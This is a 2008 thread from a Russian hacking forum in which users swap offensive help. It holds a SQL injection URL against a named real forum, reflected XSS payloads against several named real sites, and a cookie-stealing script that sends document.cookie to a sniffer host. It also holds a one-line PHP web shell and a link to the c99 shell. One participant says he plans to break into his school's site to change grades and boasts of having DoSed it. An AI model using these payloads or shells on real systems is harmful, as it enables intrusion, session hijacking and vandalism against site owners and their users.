29.11.2008, 06:45
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
Сообщение от zifanchuck
круто а вот че мне делать дальш???
попрыгать на левой ноге, сьесть яйцо в смятку, выпить пол литру молока, подтянутся 23 раза и зайти на php.net и mysql.com .. почитать ..
также рекомендуется зайти в раздел /forum30.html и тоже почитать ..
--------
.зы из ошибки, я понял что это нечто типо сайта школы /38school/
Не стоит ломать с надеждой поменять себе отметки!
|
|
|
29.11.2008, 11:18
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
Сообщение от zifanchuck
круто а вот че мне делать дальш???
Почитай, может поможет:
Код:
http://forum.antichat.ru/thread91807.html
|
|
|
|
29.11.2008, 11:36
|
|
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами:
9463474
Репутация:
155
|
|
_http://www.vs.motorolka.ru/forum/index.php?showtopic=-1+limit+1,1+union+select+1,2,3--
интересует скули такого вида..их ведь так крутить надо?сначала лимит,а потом юбнион+целест?
|
|
|
|
29.11.2008, 12:46
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
С нами:
9230096
Репутация:
464
|
|
.зы из ошибки, я понял что это нечто типо сайта школы /38school/
Не стоит ломать с надеждой поменять себе отметки!
да ты прав))) Отметки потом сменю у меня и у всей школе протест!!! Они нас в школе запирают и не выпускают некуда токо после уроков всех(((( Взломаю потом я его задосил с деда)))
|
|
|
|
29.11.2008, 13:28
|
|
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
С нами:
9230096
Репутация:
464
|
|
вопрос может не в тему но нужен шел))) на форуме ищу никак ненайду что найду непашут ссылки(( выложите кто-то
|
|
|
|
29.11.2008, 15:27
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
<?passthru($_GET[cmd]);?>
|
|
|
|
29.11.2008, 15:37
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
short_open_tag и register_globals required=\
(c) Raz0r  |
|
|
|
29.11.2008, 16:11
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
С нами:
9336002
Репутация:
204
|
|
c99comandshell
http://madnet.name/files/1/10.html
|
|
|
|
29.11.2008, 22:21
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
С нами:
9187493
Репутация:
112
|
|
Вопрос по xss
Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)
http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
собственно вставка вместо алерта запроса на снифер,вида
<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>
не пашет((
В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)
http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
|
|
|
|
30.11.2008, 12:45
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами:
10447337
Репутация:
807
|
|
Сообщение от qazer
Нашёл пару xss ,но не могу понять как составить ссылку с адресом сниффера.Помогите,я туплю)
http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
собственно вставка вместо алерта запроса на снифер,вида
<script>img = new Image(); img.src = "блаблабла?"+document.cookie;</script>
не пашет((
В благодарность за ваши советы вот ещё xss (будет супер,если ктонить объяснит как составить ссылки на сниф,т.к. в следующих ,подстановка по методу выше тоже не пашет)
http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>
в большинстве случаях фильтруются некоторые символы, например "+".
Сообщение от Pashkela
и что, а у меня опера, xss с расчетом на один браузер - гопота.
да, но иногда другого варианта нету. + приемы кроссбраузерности никто не отменял.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
